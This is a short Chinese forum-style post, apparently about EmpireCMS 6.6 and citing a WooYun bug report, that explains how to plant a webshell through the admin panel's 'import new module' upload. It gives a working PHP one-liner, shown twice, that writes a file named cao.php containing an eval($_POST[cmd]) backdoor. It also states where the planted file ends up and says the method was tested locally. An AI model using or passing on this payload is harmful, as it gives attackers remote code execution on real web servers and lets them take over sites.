見http://www.wooyun.org/bugs/wooyun-2010-03787
以前6.5的有人發的方法是,(進入後臺---系統設置---管理數據表---管理系統模型---導入新型模塊,直接把修改過的php的shell改名爲shell.php.mod上傳,新版使用uploadm~num.php來遞增數字)發現6.6不行,上傳之後會變成類似uploadm1324885505nXmTdQamQq.php這樣的!
換了個辦法其實也很簡單<?fputs(fopen("cao.php","w"),"<?eval(\$_POST[cmd]);?>")?> 保存爲1.php.mod 然後還是進入後臺---系統設置---管理數據表---管理系統模型---導入新型模塊,上傳之後馬兒就躺在了/e/admin/cao.php了
本地6.6測試通過
<?fputs(fopen("cao.php","w"),"<?eval(\$_POST[cmd]);?>")?>